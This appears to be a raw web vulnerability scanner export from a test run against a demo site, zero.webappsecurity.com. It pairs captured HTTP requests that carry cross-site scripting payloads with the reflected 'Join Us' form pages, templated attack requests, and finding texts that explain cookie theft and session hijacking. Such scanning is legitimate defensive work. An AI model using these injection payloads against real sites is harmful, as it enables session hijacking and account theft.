txtHidden=This+was+hidden+from+the+user&txtPassPhrase=333%2D333%2D3333test@test999.com&txtName=<attack></textarea><script>alert('XSS')</script></attack><script>alert\('XSS'\)</script>GET /join.asp?name=&email=&surname=&house=&street=&address2=&town=&postcode=&country=&homephone=</textarea><script>alert('XSS')</script>&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:35 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4014
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE="</textarea><script>alert('XSS')</script>"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
Possible TextArea Cross-Site ScriptingCross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This particular type takes place when input is returned embedded in the TEXTAREA paramaters.<br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.GET <var name="path"/>?name=&email=&surname=&house=&street=&address2=&town=&postcode=&country=&homephone=<attack></textarea><script>alert('XSS')</script></attack>&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/join1.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
<script>alert\('XSS'\)</script>GET /join.asp?name=&email=&surname=&house=&street=&address2=&town=test@<script>alert(document.cookie)</script>.com&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:54:43 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4022
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE="test@<script>alert(document.cookie)</script>.com"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
Parameter-Based Cross-Site ScriptingCross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This cross-site scripting attack takes place because some web applications embed user input in JavaScript string literals.<br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "<script>alert(document.cookie)</script>" . If this is found, then the script is vulnerable to cross-site scripting.GET <var name="path"/>?name=&email=&surname=&house=&street=&address2=&town=<attack>test@<script>alert(document.cookie)</script>.com</attack>&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/join1.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
test@<script>alert\(document\.cookie\)GET /plink.asp?a=1"style="background:url(javascript:alert('XSS'))"%20"&c=12 HTTP/1.0
Referer: http://zero.webappsecurity.com:80/pindex.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:36:57 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 217
Content-Type: text/html
Cache-control: private
<html>
<body>
<P>The parameter "a" = 1"style="background:url(javascript:alert('XSS'))" "</P>
<P>The parameter "c" = 12</P><br>
<a href="pindex.asp">Click here to return to index</a>
</body>
</html>
Possible Form Injection Cross-Site Scripting VulnerabilityCross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This type of cross-site scripting attack takes place by using the least amount of non standard characters.<br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.GET <var name="path"/>?a=<attack>1"style="background:url(javascript:alert('XSS'))"%20"</attack>&c=12 <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/pindex.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
"style="background:url\(javascript:alert\('XSS'\)\)GET /join.asp?name=&email=&surname=&house=&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=>"><script>alert('XSS')</script> HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:29 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 3982
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>>"><script>alert('XSS')</script></center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
Possible Bracket Double Quote Cross-Site Scripting (Single Quote)Cross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This is one of the most common type of cross-site scripting. The primary difference between this and the double quote attack is the use of apostrophes and quotes in the JavaScript code.<br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.GET <var name="path"/>?name=&email=&surname=&house=&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=<attack>>"><script>alert('XSS')</script></attack> <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/join1.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
<script>alert\('XSS'\)<\/script>GET /join.asp?name=&email=>"><script>alert('XSS')</script>&surname=&house=&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:28 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4006
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=">"><script>alert('XSS')</script>"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
Possible Bracket Double Quote Cross-Site Scripting (Single Quote)Cross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This is one of the most common type of cross-site scripting. The primary difference between this and the double quote attack is the use of apostrophes and quotes in the JavaScript code.<br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.GET <var name="path"/>?name=&email=<attack>>"><script>alert('XSS')</script></attack>&surname=&house=&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/join1.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
<script>alert\('XSS'\)<\/script>GET /_private/DocURL.indexOf( HTTP/1.0
Referer: http://zero.webappsecurity.com:80/_private/
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; passes3=; passes2=; passes=; CustomCookie=WebInspect
HTTP/1.1 403 Access Forbidden
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:41:46 GMT
Content-Length: 4214
Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html dir=ltr>
<head>
<style>
a:link {font:8pt/11pt verdana; color:FF0000}
a:visited {font:8pt/11pt verdana; color:#4e4e4e}
</style>
<META NAME="ROBOTS" CONTENT="NOINDEX">
<title>The page cannot be displayed</title>
<META HTTP-EQUIV="Content-Type" Content="text-html; charset=Windows-1252">
</head>
<script>
function Homepage(){
<!--
// in real bits, urls get returned to our script like this:
// res://shdocvw.dll/http_404.htm#http://www.DocURL.com/bar.htm
//For testing use DocURL = "res://shdocvw.dll/http_404.htm#https://www.microsoft.com/bar.htm"
DocURL=document.URL;
//this is where the http or https will be, as found by searching for :// but skipping the res://
protocolIndex=DocURL.indexOf("://",4);
//this finds the ending slash for the domain server
serverIndex=DocURL.indexOf("/",protocolIndex + 3);
//for the href, we need a valid URL to the domain. We search for the # symbol to find the begining
//of the true URL, and add 1 to skip it - this is the BeginURL value. We use serverIndex as the end marker.
//urlresult=DocURL.substring(protocolIndex - 4,serverIndex);
BeginURL=DocURL.indexOf("#",1) + 1;
urlresult=DocURL.substring(BeginURL,serverIndex);
//for display, we need to skip after http://, and go to the next slash
displayresult=DocURL.substring(protocolIndex + 3 ,serverIndex);
InsertElementAnchor(urlresult, displayresult);
}
function HtmlEncode(text)
{
return text.replace(/&/g, '&').replace(/'/g, '"').replace(/</g, '<').replace(/>/g, '>');
}
function TagAttrib(name, value)
{
return ' '+name+'="'+HtmlEncode(value)+'"';
}
function PrintTag(tagName, needCloseTag, attrib, inner){
document.write( '<' + tagName + attrib + '>' + HtmlEncode(inner) );
if (needCloseTag) document.write( '</' + tagName +'>' );
}
function URI(href)
{
IEVer = window.navigator.appVersion;
